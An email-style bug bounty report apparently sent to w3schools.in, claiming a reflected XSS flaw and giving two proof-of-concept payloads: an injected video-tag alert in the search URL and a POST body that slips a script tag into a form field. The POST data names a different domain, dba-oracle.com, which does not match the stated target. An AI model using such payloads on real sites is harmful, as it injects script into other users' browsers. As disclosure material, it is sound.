an independant web security researcher from india
has found some vulnerablities in your website.
domain
======
https://www.w3schools.in/
vulnerablity type
=================
XSS cross site scripting
Vulnerability Description
=========================
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted websites.
XSS attacks occur when an attacker uses a web application to send malicious
code, generally in the form of a browser side script, to a different end
user.
POC
===
https://www.w3schools.in/search/?q=
'"><video/source/onloadstart=(alert)(/Acehaxor/)><source>"
HTTP POS DATA
=============
url=http%3A%2F%2Fwww.dba-oracle.com
%2Foracle_news%2Frssfeed.php&showtitle=1&showimg=0&showinput=0&maxitems=5&showdescs=0&titletrim=0&titlemax=0&desctrim=0&descmax=0&tabwidth=122px%22%27--!%3E%3CScript/K/%3E(confirm)(1)%3C/Script/K/%3E&linktarget=_blank&cssurl=&dotransition=1&bordercol=%2300359E&headbgcol=%23999999&headtxtcol=%23ffffff&titlebgcol=%23dddddd&titletxtcol=%230000ff&itembgcol=%23ffffff&itemtxtcol=%23000000&mode=javascript&ctl=0#
THE SCREENSHOTS AND THE VIDEO POC ARE ATTACHED BELOW
HOPE YOU'LL FIX IT ASAP ;)
IF I AM ELIGIBLE FOR ANY TYPE OF REWARDS , THANKS , SWAGS , RECOMENATION.
KINDLY DO THE NEEDFULL
BEST REGARDS
-Acelakshit verma
--
<https://about.me/weareplymouths?promo=email_sig&utm_source=product&utm_medium=email_sig&utm_campaign=gmail_api&utm_content=thumb>
We Are Plymouth's
about.me/weareplymouths
<https://about.me/weareplymouths?promo=email_sig&utm_source=product&utm_medium=email_sig&utm_campaign=gmail_api&utm_content=thumb>
